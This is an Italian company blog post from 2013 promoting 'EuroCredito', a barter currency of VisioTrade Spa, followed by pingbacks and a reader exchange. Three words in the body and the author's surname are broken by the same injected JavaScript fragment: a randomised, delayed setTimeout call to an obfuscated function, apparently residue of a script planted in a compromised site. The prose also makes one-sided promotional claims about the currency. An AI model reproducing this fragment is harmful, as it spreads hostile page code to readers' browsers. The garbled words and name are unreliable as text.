Da non perdere!

EuroCredito, Benvenuta moneta del futuro!

Pubblicato il 27 settembre 2013
Condividi

L'EuroCredito: cos'è e come può salvare le aziendeChe differenza c’è fra un euro e un eurocredito? In termini di valore, nessuna. 1 Euro equivale a 1 eurocredito. In realtà moltissime.

L’eurocredito arriva dove l’euro non può più. E’ una moneta libera, alternativa, complementare a quella esistente, ma diversa profondamente da essa proprio perché slegata da logiche bancarie, speculative, finanziarie. L’eurocredito non è in crisi, l’euro invece sì. L’eurocredito è una mano tesa a chi vuol produrre, l’euro è un pugno chiuso rivolto a chi vuol creare un’attività. L’eurocredito non misura il livello degli interessi, bensì quello degli scambi commerciali in compensazione, in baratto fra imprese. Li favorisce, al contrario dell’euro che invece li blocca, se può. Non si conia, non si tiene nel portafoglio. Non pesa, è leggero.

L’eurocredito è l’unica moneta privata capace di determinare un vantaggio reale. Perchè muove le sorti dell’economia laddove il denaro non è più in grado di farlo, trasformandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando ciò che è invenduto in possibilità di nuovi affari. Stimolandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando la capacità produttiva inespressa di quanti, purtroppo, dipendono ancora dal denaro come unico strumento di produzione di ricchezza. L’eurocredito esiste grazie all’informatica, la sua casa è l’home-banking del baratto fra imprese di VisioTrade Spa, alloggia sugli schermi dei pc di quanti credono che per fare impresa e business i vecchi modelli di sviluppo siano ormai démodé. Superati. L’eurocredito genera relazioni, contatti, promuove idee e spunti per dare spazio al nuovo che avanza.

L’eurocredito è il futuro, che inizia però dal presente. Rende liberi. Liberi di produrre, di esprimersi. Liberi di fare. Liberi di creare. Benvenuto eurocredito, moneta del futuro!

Maurizio Scandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andurra

6 commenti

  1. Pingback: Visiotrade Spa On Air Su Radio 24 ai Microfoni di Alessio Fabrizi nel Programma “Si Puo’ Fare” - VisioBlog

  2. Pingback: Baratto = Più produzione, meno evasione. Parola di VisioTrade SpA - VisioBlog

  3. Tarquinio

    2 novembre 2013 at 21:10

    Salve vorrei più chiarimento per entrare in visio trade
    Sono un artigiano termo idraulico
    […]
    Cordiali saluti

    • VisioTrade

      4 novembre 2013 at 10:11

      Ciao Tarquinio, abbiamo cancellato i tuoi dati personali per la tua sicurezza.
      Abbiamo inoltrato la tua richiesta al Responsabile Commerciale che ti contatterà il più presto possibile.
      Nel frattempo ti auguriamo un buon inizio settimana.

  4. Pingback: Quanto valore dai alle aziende che ti piacciono? - VisioBlog

  5. Pingback: 2014, quale speranza? - VisioBlog

Lascia un commento

Annulla risposta

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *